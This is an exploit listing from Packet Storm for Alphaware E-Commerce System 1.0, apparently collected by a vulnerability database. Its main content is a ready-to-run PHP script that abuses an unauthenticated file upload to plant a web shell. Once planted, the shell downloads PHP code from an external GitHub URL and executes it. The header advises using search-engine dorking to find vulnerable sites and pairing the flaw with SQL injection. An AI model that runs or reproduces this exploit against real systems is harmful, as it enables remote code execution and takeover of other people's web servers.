Lucene search

K
packetstormIndoushkaPACKETSTORM:180292
HistoryAug 21, 2024 - 12:00 a.m.

Alphaware E-Commerce System 1.0 Code Injection

2024-08-2100:00:00
indoushka
packetstormsecurity.com
65
alphaware
e-commercesystem
php code injection
vulnerability
file upload
remote code execution
windows 10
mozilla firefox
vendor
indoushka
poc
dorking
sql injection
cmd usage
curl
shell
target ip
greetings

AI Score

7.4

Confidence

Low

`=============================================================================================================================================  
| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] This payload injects php code of your choice into an SHELL.php file.   
  
[+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.  
combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1  
  
[+] payload :   
  
<?php  
  
function file_upload($target_ip) {  
$file_name = "indoushka.php";  
  
$webshell_payload = "<?php  
\$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';  
\$ch = curl_init();  
curl_setopt(\$ch, CURLOPT_URL, \$url);  
curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);  
\$output = curl_exec(\$ch);  
curl_close(\$ch);  
if (\$output) {  
// Safely include the content of the remote PHP file  
include 'data://text/plain;base64,' . base64_encode(\$output);  
}  
?>";  
  
$post_fields = array(  
'add' => '',  
'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),  
'product_name' => 'inouva',  
'product_price' => '123',  
'product_size' => '99',  
'brand' => 'N0_name',  
'category' => 'Hackers',  
'qty' => '1'  
);  
  
echo "(+) PHP Code Injection ...\n";  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
echo "(+) Shell uploaded successfully.\n";  
echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";  
}  
  
if ($argc != 2) {  
echo "(+) Usage: php " . $argv[0] . " <target ip>\n";  
echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";  
exit(-1);  
}  
  
$target_ip = $argv[1];  
file_upload($target_ip);  
  
  
[+] Path : http://127.0.0.1/alphaware/photo/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

AI Score

7.4

Confidence

Low